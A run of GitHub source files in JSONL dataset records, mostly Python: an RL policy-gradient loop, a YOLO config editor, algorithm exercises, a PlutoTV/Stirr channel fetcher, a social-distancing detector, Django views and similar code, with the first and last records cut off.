agent = agents.PolicyGradientAgent(\n net, preprocessor=utils.float32_preprocessor, apply_softmax=True\n )\n\n # RUNNER\n exp_source = runner.RunnerSourceFirstLast(\n env, agent, gamma=params[\"gamma\"], steps_count=params[\"step_count\"]\n )\n optimizer = optim.Adam(net.parameters(), lr=params[\"learning_rate\"])\n\n total_rewards = []\n step_idx = 0\n done_episodes = 0\n\n batch_episodes = 0\n batch_states, batch_actions, batch_scales = [], [], []\n cur_rewards = []\n reward_sum = 0\n\n with logger.RewardTracker(writer, params[\"stop_reward\"]) as reward_tracker:\n for step_idx, exp in enumerate(exp_source):\n reward_sum += exp.reward\n baseline = reward_sum / (step_idx + 1)\n writer.add_scalar(\"baseline\", baseline, step_idx)\n\n batch_states.append(exp.state)\n batch_actions.append(int(exp.action))\n batch_scales.append(exp.reward - baseline)\n\n new_rewards = exp_source.pop_total_rewards()\n if new_rewards:\n done_episodes += 1\n reward = new_rewards[0]\n total_rewards.append(reward)\n if reward_tracker.reward(new_rewards[0], step_idx):\n break\n\n if len(batch_states) < params[\"batch_size\"]:\n continue\n\n states_v = torch.FloatTensor(batch_states)\n batch_actions_t = torch.LongTensor(batch_actions)\n batch_scale_v = torch.FloatTensor(batch_scales)\n\n # calculate loss\n optimizer.zero_grad()\n logits_v = net(states_v)\n log_prob_v = F.log_softmax(logits_v, dim=1)\n log_prob_actions_v = (\n batch_scale_v * log_prob_v[range(params[\"batch_size\"]), batch_actions_t]\n )\n loss_policy_v = -log_prob_actions_v.mean()\n\n # # calculate entropy\n entropy_loss, prob_v = calculate_entropy(\n logits_v, log_prob_v, beta=params[\"beta\"]\n )\n loss_v = loss_policy_v + entropy_loss\n\n loss_v.backward()\n optimizer.step()\n\n # calc KL-div\n kl_div_v = calculate_kl_divergence(net(states_v), prob_v)\n writer.add_scalar(\"kl\", kl_div_v.item(), step_idx)\n\n # calculate the stats\n grad_max = 0.0\n grad_means = 0.0\n grad_count = 0\n for p in net.parameters():\n grad_max = max(grad_max, p.grad.abs().max().item())\n grad_means += (p.grad ** 2).mean().sqrt().item()\n grad_count += 1\n\n batch_states.clear()\n batch_actions.clear()\n batch_scales.clear()\n","repo_name":"djbyrne/RL_Workbench","sub_path":"algos/policy_gradients/vanilla_policy_gradient.py","file_name":"vanilla_policy_gradient.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6409273393","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-10-16 17:22\n# @Author : Yan An\n# @Contact: an.yan@intellicold.ai\n\nimport os\n\nfrom utils import load_dict,write_dict\n\n\nprint('modify parameters...')\ninfo = load_dict()\ninput_size = info['input_size']\ntrain_num = int(info['train'])\n\n# 没张图过273便,和作者训练的对应\nmax_batches = int(train_num * 273 / 64)\n# 到这一step调整学习旅\nstep1 = int(max_batches * 0.8)\nstep2 = int(max_batches * 0.9)\n\nn_clusters = info['n_clusters']\nmask_index = 0\n\nn_classes = info['n_classes']\n\nanchors = info['anchors']\n\nf2 = open('./darknet/cfg/yolov3-' + str(input_size) + '.cfg', 'w', encoding = 'utf-8')\n\nwith open('./darknet/cfg/yolov3.cfg', 'r', encoding = 'utf-8') as f:\n\tcontents = f.readlines()\n\n\tfor content in contents:\n\n\t\tif content.startswith('subdivisions'):\n\t\t\tif input_size == 416:\n\t\t\t\tcontent = 'subdivisions=8' + '\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\telif input_size == 608:\n\t\t\t\tcontent = 'subdivisions=16' + '\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\telse:\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\t\tcontent = 'subdivisions=32' + '\\n'\n\n\t\tif content.startswith('width'):\n\t\t\tcontent = 'width=' + str(input_size) + '\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('height'):\n\t\t\tcontent = 'height=' + str(input_size) + '\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('max_batches='):\n\t\t\tcontent = 'max_batches=' + str(max_batches) + '\\n'\n\t\t\tprint(content.replace('\\n',''))\n\t\t\twrite_dict('max_batches', max_batches)\n\n\t\tif content.startswith('steps'):\n\t\t\tcontent = 'steps=' + str(step1) + ',' + str(step2) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\t\t#等好之前有个空格,和不用修改的filters区分开来\n\t\tif content.startswith('filters ='):\n\t\t\tcontent = 'filters =' + str(int(n_clusters / 3 * (n_classes + 5))) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('mask'):\n\t\t\tif n_clusters == 6:\n\t\t\t\tcontent = 'mask=' + str(n_clusters - mask_index -2) + ',' + str(n_clusters - mask_index - 1) +'\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\tif n_clusters == 9:\n\t\t\t\tcontent = 'mask=' + str(n_clusters - mask_index -3) + ',' + str(n_clusters - mask_index - 2) + ',' + str(n_clusters - mask_index -1) +'\\n'\n\t\t\t\tprint(content.replace('\\n',''))\n\t\t\tmask_index += int(n_clusters / 3)\n\n\t\tif content.startswith('anchors'):\n\t\t\tcontent = 'anchors=' + anchors +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('classes'):\n\t\t\tcontent = 'classes=' + str(n_classes) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tif content.startswith('num'):\n\t\t\tcontent = 'num=' + str(n_clusters) +'\\n'\n\t\t\tprint(content.replace('\\n',''))\n\n\t\tf2.write(content)\n\nf2.close()\n\nf3 = open('./darknet/examples/detector.backup', 'a+', encoding = 'utf-8')\nwith open('./darknet/examples/detector.c', 'r', encoding = 'utf-8') as f:\n\tcontents = f.readlines()\n\n\tfor content in contents:\n\n\t\tif content.startswith(' int dim = '):\n\t\t\tcontent = ' int dim = (rand() % 10 + ' + str(int((input_size / 32) - 9)) + ') * 32;' + '\\n'\n\t\t\tprint(content.replace('\\n','').lstrip())\n\n\t\tif content.startswith(' if (get_current_batch(net)+200 > net->max_batches) dim'):\n\t\t\tcontent = ' if (get_current_batch(net)+200 > net->max_batches) dim = ' + str(input_size) + ';' + '\\n'\n\t\t\tprint(content.replace('\\n','').lstrip())\n\n\t\tf3.write(content)\nf3.close()\n\nos.remove('./darknet/examples/detector.c')\nos.rename('./darknet/examples/detector.backup','./darknet/examples/detector.c')\n","repo_name":"isyanan1024/YOLOV3","sub_path":"modify_parameters.py","file_name":"modify_parameters.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24232355225","text":"'''\n思路:\n 比较nums,若为偶数,操作 若为奇数减一再操作\n'''\ndef f(num):\n temp=0\n while num>0:\n if num%2==0:\n temp+=1\n num=num//2\n else:\n num=num-1\n temp+=1\n return temp\n\nnum=8\nprint(f(num))\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/207/1342.py","file_name":"1342.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24170673521","text":"import io\r\nimport sys\r\n#sys.setrecursionlimit(10**7)\r\nfrom collections import deque,defaultdict\r\nfrom heapq import heappush,heappop \r\nfrom itertools import product,combinations,accumulate\r\ndef input(): return sys.stdin.readline().strip()\r\ndef INT(): return int(input())\r\ndef MAP(): return map(int,input().split())\r\ndef LIST(): return list(map(int,input().split()))\r\nINF = float('inf')\r\ndirc = [(0,1),(0,-1),(1,0),(-1,0)]\r\n#dirc2 = [(0,1),(0,-1),(1,0),(-1,0),(-1,-1),(-1,1),(1,-1),(1,1)]\r\n#mod = 10**9+7\r\n#mod = 998244353\r\n######################################################\r\n_INPUT = \"\"\"\\\r\n2 2021\r\n2 3\r\n\"\"\"\r\nsys.stdin = io.StringIO(_INPUT)\r\n######################################################\r\n\"\"\"\r\n答えで決め打つ二分探索\r\nある値Xが与えられたとき、〇〇を満たすことはできるか」という判定問題を考え、\r\nその判定問題を繰り返す解くことでYesになるXとNoになるXの間の境界を特定し、\r\n元の問題の答えを求める\r\n\r\n解法1:各操作時に楽しさが最大のアトラクションを選ぶことを繰り返す\r\n 地道に-1するとTLEしてしまうので次に大きい数と一致するまで\r\n 一気に減らす工夫をすると高速化できる\r\n解法2:楽しさがm以上のアトラクションにすべて乗ったとき、\r\n 乗った回数がK回以下になるかをニブタンする\r\n\"\"\"\r\n######################################################\r\ndef is_ok(arg):\r\n # 条件を満たすかどうか?問題ごとに定義\r\n cnt = 0\r\n for x in A:\r\n if x>=arg:#それぞれの乗り物についてarg以上のものの個数をカウントする\r\n cnt += x-arg+1\r\n return cnt<=K #楽しさarg以上の乗った回数の合計回数がK以下のとき条件を満たす\r\n\r\ndef meguru_bisect(ng, ok):\r\n '''\r\n 初期値のng,okを受け取り,is_okを満たす最小(最大)のokを返す\r\n まずis_okを定義すべし\r\n ng ok は とり得る最小の値-1 とり得る最大の値+1\r\n 最大最小が逆の場合はよしなにひっくり返す\r\n '''\r\n while (abs(ok - ng) > 1):\r\n mid = (ok + ng) // 2\r\n if is_ok(mid):\r\n ok = mid\r\n else:\r\n ng = mid\r\n return ok\r\n\r\nN,K = MAP()\r\nA = LIST()\r\nm = meguru_bisect(ng=0,ok=2*10**9+1)\r\nrem = K\r\nans = 0\r\n#M以上の要素を全て選ぶ(等差数列の和の公式を用いてansに加算)\r\nfor i in range(N):\r\n x = A[i]\r\n if x>=m:\r\n diff = x-m+1\r\n ans += diff*(x+m)//2\r\n rem -= diff\r\n#残りK個に満たない部分はM-1を残り回数分選ぶ\r\nans += rem*(m-1)\r\nprint(ans)\r\n","repo_name":"kaichan1224/Atcoder","sub_path":"探索/二分探索/決め打ちニブタン(解説AC)ABC216E.py","file_name":"決め打ちニブタン(解説AC)ABC216E.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27377263872","text":"import pandas as pd\nimport ukpopulation.nppdata as NPPData\nimport ukpopulation.snppdata as SNPPData\nimport ukpopulation.utils as utils\n\n# initialise the population modules\nnpp = NPPData.NPPData()\nsnpp = SNPPData.SNPPData()\n\n# start with an empty data frame\nresult = pd.DataFrame()\n\ncountry = utils.WA\nhorizon = 2050\n\n# get the first year where extrapolation is necessary, extrapolate to 2050\nex_years = range(snpp.max_year(country) + 1, horizon + 1)\n\n\n# loop over all the Welsh LADs \nfor lad in snpp.data[country].GEOGRAPHY_CODE.unique():\n print(lad)\n\n # extrapolate and aggregate\n lad = snpp.extrapolagg([\"GENDER\", \"C_AGE\"], npp, lad, ex_years)\n # append to data\n result = result.append(lad, ignore_index=True)\n\n# write out results\nresult.to_csv(\"snpp_extrap_{}_{}.csv\".format(country, horizon), index=False)\n\n","repo_name":"nismod/ukpopulation","sub_path":"doc/example_extrapolate_all.py","file_name":"example_extrapolate_all.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"17832839800","text":"def merge_sort(array):\n if len(array) == 1:\n return array\n\n middle_idx = len(array) // 2\n left_array = array[:middle_idx]\n right_array = array[middle_idx:]\n return merge_sorted_array(merge_sort(left_array), merge_sort(right_array))\n\n\ndef merge_sorted_array(left_half, right_half):\n sorted_array = [None] * (len(left_half) + len(right_half))\n k = i = j = 0\n while i < len(left_half) and j < len(right_half):\n if left_half[i] <= right_half[j]:\n sorted_array[k] = left_half[i]\n i += 1\n else:\n sorted_array[k] = right_half[j]\n j += 1\n k += 1\n while i < len(left_half):\n sorted_array[k] = left_half[i]\n i += 1\n k += 1\n while j < len(right_half):\n sorted_array[k] = right_half[j]\n j += 1\n k += 1\n\n return sorted_array\n\n\ndef mergeSort(array):\n # Write your code here.\n if len(array) <= 1:\n return array\n aux_array = array[:]\n ","repo_name":"manojkumar1053/random_code_practice","sub_path":"AE/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2274877899","text":"# https://adventofcode.com/2022/day/8\n\nimport os\nfrom abc import ABC, abstractproperty\nfrom functools import cached_property\nfrom pathlib import Path\nfrom typing import List, NamedTuple, Union\n\n\nclass Obstacle(NamedTuple):\n height: int\n coord: int\n\n\nclass TreeMap:\n OUTSIDE_HEIGHT: int = 10\n\n size: int\n trees: List[List[\"Inner\"]]\n\n def __init__(self, data: List[List[int]]) -> None:\n self.size = len(data)\n self.trees = [[] for _ in range(self.size)]\n self._parse_data(data)\n\n def get_tree(self, x: int, y: int) -> \"Inner\":\n if 0 <= x < self.size and 0 <= y < self.size:\n return self.trees[y][x]\n return self.Tree(self.OUTSIDE_HEIGHT, x, y)\n\n def _parse_data(self, data: List[List[int]]):\n for y, row in enumerate(data):\n for x, height in enumerate(row):\n self.trees[y].append(self.Tree(height, x, y))\n\n class Inner(ABC):\n height: int\n x: int\n y: int\n\n @abstractproperty\n def upper_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def right_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def lower_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def left_obstacle(self) -> Obstacle:\n raise NotImplementedError()\n\n @abstractproperty\n def is_visible(self) -> bool:\n raise NotImplementedError()\n\n def get_scenic_score(self) -> int:\n raise NotImplementedError()\n\n def Tree(self, height: int, x: int, y: int) -> Inner:\n tree_map = self\n\n class _Tree(TreeMap.Inner):\n def __init__(self, height: int, x: int, y: int) -> None:\n self.height = height\n self.tree_map = tree_map\n self.x = x\n self.y = y\n\n @cached_property\n def upper_obstacle(self) -> Obstacle:\n tree_up = self.tree_map.get_tree(self.x, self.y - 1)\n while tree_up.height < self.height:\n tree_up = self.tree_map.get_tree(self.x, tree_up.upper_obstacle.coord)\n return Obstacle(tree_up.height, tree_up.y)\n\n @cached_property\n def right_obstacle(self) -> Obstacle:\n tree_right = self.tree_map.get_tree(self.x + 1, y)\n while tree_right.height < self.height:\n tree_right = self.tree_map.get_tree(tree_right.right_obstacle.coord, self.y)\n return Obstacle(tree_right.height, tree_right.x)\n\n @cached_property\n def lower_obstacle(self) -> Obstacle:\n tree_down = self.tree_map.get_tree(self.x, self.y + 1)\n while tree_down.height < self.height:\n tree_down = self.tree_map.get_tree(self.x, tree_down.lower_obstacle.coord)\n return Obstacle(tree_down.height, tree_down.y)\n\n @cached_property\n def left_obstacle(self) -> Obstacle:\n tree_left = self.tree_map.get_tree(self.x - 1, self.y)\n while tree_left.height < self.height:\n tree_left = self.tree_map.get_tree(tree_left.left_obstacle.coord, self.y)\n return Obstacle(tree_left.height, tree_left.x)\n\n @property\n def is_visible(self) -> bool:\n return any(\n obstacle.height == self.tree_map.OUTSIDE_HEIGHT\n for obstacle in (self.upper_obstacle, self.right_obstacle, self.lower_obstacle, self.left_obstacle)\n )\n\n def get_scenic_score(self) -> int:\n return (\n (self.y - max(0, self.upper_obstacle.coord))\n * (min(self.tree_map.size - 1, self.right_obstacle.coord) - self.x)\n * (min(self.tree_map.size - 1, self.lower_obstacle.coord) - self.y)\n * (self.x - max(0, self.left_obstacle.coord))\n )\n\n return _Tree(height, x, y)\n\n\ndef load_data(path: Union[str, bytes, os.PathLike]) -> List[List[int]]:\n with open(path) as fd:\n return [[int(value) for value in row.strip()] for row in fd]\n\n\ndef part_one(data: List[List[int]]) -> int:\n tree_map = TreeMap(data)\n return sum([tree.is_visible for row in tree_map.trees for tree in row])\n\n\ndef part_two(data: List[List[int]]) -> int:\n tree_map = TreeMap(data)\n return max(tree.get_scenic_score() for row in tree_map.trees for tree in row)\n\n\nif __name__ == \"__main__\":\n input_dir = Path().resolve().parent / \"inputs/08\"\n samples = load_data(input_dir / \"samples.in\")\n data = load_data(input_dir / \"data.in\")\n\n assert part_one(samples) == 21\n assert part_two(samples) == 8\n\n print(part_one(data))\n print(part_two(data))\n","repo_name":"koczanm/advent-of-code","sub_path":"2022/python/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41161014864","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n################################### modified by aime_jeux ##################################\r\n############# Aout 2021 #############\r\n############################################################################################\r\nimport warnings\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nwarnings.simplefilter('ignore',InsecureRequestWarning)\r\n########################################################################\r\nimport requests,re,json,time,hashlib,sys\r\nSt = requests.Session()\r\nfrom time import ctime\r\n########################################################################\r\nBASE_API = \"https://i.mjh.nz/PlutoTV/app.json\"#\"https://raw.githubusercontent.com/matthuisman/i.mjh.nz/master/PlutoTV/app.json\"#\r\nBASE_Stirr = \"https://i.mjh.nz/Stirr/app.json\"#\"https://raw.githubusercontent.com/matthuisman/i.mjh.nz/master/Stirr/app.json\"#\r\n##############################################\r\ndef buildHeader_Pluto_Second():\r\n header_dict = {}\r\n header_dict[\"Host\"] = \"i.mjh.nz\"#\"raw.githubusercontent.com\"#\"i.mjh.nz\"\r\n header_dict[\"User-Agent\"] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0\"\r\n header_dict[\"Accept\"] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\"\r\n header_dict[\"Accept-Language\"] = \"fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\"\r\n header_dict[\"Accept-Encoding\"] = \"gzip, deflate\"\r\n #header_dict[\"Alt-Used\"] = \"i.mjh.nz\"\r\n header_dict[\"Connection\"] = \"keep-alive\"\r\n return header_dict\r\n##############################################\r\nfrom Plugins.Extensions.SupTVoDNeW.OutilsSup.Sptvnw.Config import show_listprogramme,show_Menu_PlutoTv_Stirr\r\n##############################################\r\nclass ImportData():\r\n def __init__(self):\r\n self.Loading = 'Loading ...... List Live TV %s.. ' % 'Please wait'\r\n self.listvodmenu = {}\r\n self.chapters = {}\r\n self.menu = []\r\n self._list = []\r\n self.list_seasons = []\r\n self.menu_ = []\r\n self.Aze = ''\r\n self.Zer = ''\r\n def getURL_Pluto_Second(self,url,header):\r\n try:\r\n req = requests.get(url,headers=header,verify=False)\r\n req.raise_for_status()\r\n return True,req.json()\r\n except Exception:\r\n return False,{}\r\n def getChannels_Pluto(self):\r\n headers = buildHeader_Pluto_Second()\r\n a,self.listvodmenu = self.getURL_Pluto_Second(BASE_API, headers)\r\n if a:return True,self.listvodmenu\r\n else:return False,self.listvodmenu\r\n def Programmes_Pluto(self,_Ttl,listos,prox,sid):\r\n self.listprogramme = []\r\n self._dons = ''\r\n self.Aze = listos['regions'][prox]['channels'][str(sid)]\r\n self.Zer = self.Aze['programs']\r\n self.lenlist = len(self.Zer)\r\n i = 1\r\n self.listprogramme.append(show_listprogramme('',_Ttl,'premier'))\r\n self.listprogramme.append(show_listprogramme('Program','Time','second'))\r\n for items in self.Zer:\r\n Titles = items[1].encode('utf-8')\r\n timep = items[0]\r\n Tme_ = ctime(timep)\r\n self._dons += Titles+' : '+str(Tme_)+'\\n'\r\n self.listprogramme.append(show_listprogramme(str(i),Titles,Tme_))\r\n i = i + 1\r\n return str(self._dons),self.listprogramme\r\n def getChannels_Pluto_Stirr(self):\r\n self.myfinalist = []\r\n self.List_MoviePlayer_1 = []\r\n headers = buildHeader_Pluto_Second()\r\n a,self.listvodmenu = self.getURL_Pluto_Second(BASE_Stirr, headers)\r\n if a:\r\n i = 1\r\n for keys in self.listvodmenu['channels'].keys():\r\n name = self.listvodmenu['channels'][keys].get('name','').encode('utf-8')#\r\n description = self.listvodmenu['channels'][keys].get('description','')#\r\n logo = self.listvodmenu['channels'][keys].get('logo','')#\r\n url = self.listvodmenu['channels'][keys].get('url','')#\r\n groups = self.listvodmenu['channels'][keys].get('groups','')#\r\n programs = self.listvodmenu['channels'][keys].get('programs','')\r\n self.myfinalist.append(show_Menu_PlutoTv_Stirr(str(i)+'. '+name,url,logo,groups,description,programs))\r\n self.List_MoviePlayer_1.append(('',name,name +' .......','',url,'','',logo,'',''))\r\n i = i + 1\r\n return True,self.myfinalist,self.List_MoviePlayer_1\r\n else:return False,self.listvodmenu,self.List_MoviePlayer_1","repo_name":"aimejeux/suptvodnew","sub_path":"OutilsSup/PlutoTvSecond/ImportData.py","file_name":"ImportData.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"779660228","text":"# program to compute SD in images\nimport numpy as np\nimport argparse\nimport time\nimport cv2\nimport math\n\n# argument parser\narg = argparse.ArgumentParser()\narg.add_argument(\"--image\", required=True, help=\"path to input image\")\narg.add_argument(\"-d\", \"--distance\", type=float, default=100.0, help=\"pixels distance to calculate social distance\")\nargs = vars(arg.parse_args())\n\nlabelsPath = \"./coco.names\"\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\nnp.random.seed(42)\nCOLORS = np.random.randint(0, 255, size=(len(LABELS), 3),\n dtype=\"uint8\")\nweightsPath = \"./yolo-coco/yolov3.weights\"\nconfigPath = \"./yolo-coco/yolov3.cfg\"\n\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n\nimage = cv2.imread(args[\"image\"])\n(H, W) = image.shape[:2]\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\nblob = cv2.dnn.blobFromImage(image, 1 / 255.0, (416, 416), swapRB=True, crop=False)\nnet.setInput(blob)\nstart = time.time()\nlayerOutputs = net.forward(ln)\nend = time.time()\nprint(\"Frame Prediction Time : {:.6f} seconds\".format(end - start))\nboxes = []\nconfidences = []\nclassIDs = []\nfor output in layerOutputs:\n for detection in output:\n scores = detection[5:]\n classID = np.argmax(scores)\n confidence = scores[classID]\n if confidence > 0.5 and classID == 0:\n box = detection[0:4] * np.array([W, H, W, H])\n (centerX, centerY, width, height) = box.astype(\"int\")\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n classIDs.append(classID)\n\nidxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)\nind = []\nfor i in range(0, len(classIDs)):\n if (classIDs[i] == 0):\n ind.append(i)\na = []\nb = []\ncolor = (0, 255, 0)\nif len(idxs) > 0:\n for i in idxs.flatten():\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n a.append(x)\n b.append(y)\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n\ndistance = []\nnsd = []\nfor i in range(0, len(a) - 1):\n for k in range(1, len(a)):\n if (k == i):\n break\n else:\n x_dist = (a[k] - a[i])\n y_dist = (b[k] - b[i])\n d = math.sqrt(x_dist * x_dist + y_dist * y_dist)\n distance.append(d)\n if (d <= args[\"distance\"]):\n nsd.append(i)\n nsd.append(k)\n nsd = list(dict.fromkeys(nsd))\n\ncolor = (0, 0, 255)\nfor i in nsd:\n (x, y) = (boxes[i][0], boxes[i][1])\n (w, h) = (boxes[i][2], boxes[i][3])\n cv2.rectangle(image, (x, y), (x + w, y + h), color, 2)\n text = \"Alert\"\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\ncv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\ncv2.imshow(\"Image\", image)\ncv2.imwrite('./output_sd.jpg', image)\ncv2.waitKey()\n","repo_name":"RakeshRaj97/covid-19-face-mask-and-social-distancing-detection","sub_path":"detect_social_distance_image.py","file_name":"detect_social_distance_image.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"33383821301","text":"def is_a_first(a, b, names):\n\n def divide_name(name):\n i = 0\n head = num = tail = ''\n\n while not name[i].isnumeric():\n head += name[i]\n i += 1\n\n while name[i:i+1].isnumeric() and len(num) != 5:\n num += name[i]\n i += 1\n\n tail = name[i:]\n return head, num, tail\n\n a_parts = divide_name(a)\n b_parts = divide_name(b)\n\n # head\n if a_parts[0].upper() < b_parts[0].upper():\n return True\n elif a_parts[0].upper() > b_parts[0].upper():\n return False\n\n # num\n if int(a_parts[1]) < int(b_parts[1]):\n return True\n elif int(a_parts[1]) > int(b_parts[1]):\n return False\n\n # original order\n return names.index(a) < names.index(b)\n\n\ndef filename_merge(arr):\n arr_copy = arr.copy()\n\n def divide(lo, hi):\n if lo == hi:\n return arr_copy[lo]\n\n mid = (lo + hi) // 2\n divide(lo, mid)\n divide(mid+1, hi)\n\n merge(lo, mid, hi)\n\n def merge(lo, mid, hi):\n left = lo\n right = mid + 1\n tmp = []\n\n while left <= mid or right <= hi:\n if left <= mid and (right > hi or is_a_first(arr_copy[left], arr_copy[right], arr)):\n tmp.append(arr_copy[left])\n left += 1\n else:\n tmp.append(arr_copy[right])\n right += 1\n\n arr_copy[lo:hi+1] = tmp\n\n divide(0, len(arr_copy)-1)\n return arr_copy\n\n\nif __name__ == '__main__':\n test = ['img12.png', 'img10.png', 'img02.png', 'img1.png', 'IMG01.GIF', 'img2.JPG']\n print(test, '\\n', filename_merge(test))\n\n print('\\n' + '-' * 30 + '\\n')\n\n test = ['F-5 Freedom Fighter', 'B-50 Superfortress', 'A-10 Thunderbolt II', 'F-14 Tomcat']\n print(test, '\\n', filename_merge(test))\n","repo_name":"shoark7/algorithm-with-python","sub_path":"problems_solving/kakao/filename_merge.py","file_name":"filename_merge.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"2817181895","text":"from tkinter import *\n\ndef choice():\n\n if(radio.get()==1):\n root.configure(background='red')\n elif(radio.get()==2):\n root.configure(background='blue')\n elif(radio.get()==3):\n root.configure(background='green')\n\nroot= Tk()\nroot.geometry(\"1000x1000\")\nradio=IntVar()\nrb1=Radiobutton(root,text='Red', variable=radio,width=50,value=1, command=choice)\nrb1.grid(row=0)\nrb2=Radiobutton(root,text='Blue', variable=radio,width=50,value=2, command=choice)\nrb2.grid(row=1)\nrb3=Radiobutton(root,text='Green', variable=radio,width=50,value=3, command=choice)\nrb3.grid(row=3)\nroot.mainloop()","repo_name":"PensPencil/Codes","sub_path":"Python Codes/tkinter/INTRODUCTION/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8160689248","text":"from pathlib import Path\n\nfrom app.videos.shemas import AudioStream\nfrom app.config import CHUNK_SIZE, AUDIOS_DIR\n\n\ndef get_audio_stream(\n video_id: str, start: int = 0, end: int | None = None) -> AudioStream:\n if not end:\n end = start + CHUNK_SIZE\n path = AUDIOS_DIR / video_id\n data = _read_audio_bytes(path, start, end)\n filesize = path.stat().st_size\n return AudioStream(start=start, end=end, data=data, filesize=filesize)\n\n\ndef _read_audio_bytes(path: Path, start, end: int) -> bytes:\n with open(path, 'rb') as video:\n video.seek(start)\n return video.read(end - start)\n\n","repo_name":"n1ktrnv/audioplayer","sub_path":"app/videos/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27465597990","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom listings.models import Listing\nfrom realtors.models import Realtor\nfrom listings.choices import price_choices, bedroom_choices, state_choices\n\n\ndef index(request):\n \"\"\"This main view for the website. It also shows up to 3 of the featured listings.\n\n Args:\n request:The HTTP request\n Returns:\n render: call to render with the request and URL\n \"\"\"\n listings = Listing.objects.order_by('-list_date').filter(is_published=True)[:3]\n # a dictionary can be used as an argument to pass information to the template or html page dynamically.\n context = {\n 'listings': listings,\n 'state_choices': state_choices,\n 'price_choices': price_choices,\n 'bedroom_choices': bedroom_choices,\n }\n # Pass in the context that contains the listing objects\n return render(request, 'pages/index.html', context)\n\n\ndef about(request):\n \"\"\"The about page for the BT Realty site. This view shows a list of all realtors and has a separate query and\n context object for the mvp/seller of the month.\n\n Args:\n request:The HTTP request\n Returns:\n render: call to render with the request and URL\n \"\"\"\n realtors = Realtor.objects.order_by('-hire_date')\n\n # get the seller of the month -> is_mvp = True\n mvp_realtors = Realtor.objects.all().filter(is_mvp=True)\n\n context = {\n 'realtors': realtors,\n 'mvp_realtors': mvp_realtors,\n }\n return render(request, 'pages/about.html', context)\n\n","repo_name":"DavidHartman-Personal/btre_project","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27439521170","text":"import torch\nimport sys \nimport mlsr_training.sesr_common as common\nimport copy\nimport numpy as np\nimport torch.nn as nn\nfrom collections import OrderedDict\n# from .convolution import reset_state, detach_state\n# def make_model(args, parent=False):\n# return SESR(args)\n\ndef Conv(in_channels, out_channels, kernel_size, stride, padding, groups=1):\n conv_seq = nn.Sequential()\n conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\n kernel_size=kernel_size, stride=stride, padding=padding, groups=groups, bias=False)\n conv_seq.add_module('conv', conv)\n # conv_seq.add_module('bn', nn.BatchNorm2d(out_channels))\n return conv_seq\n\n## Residual Block 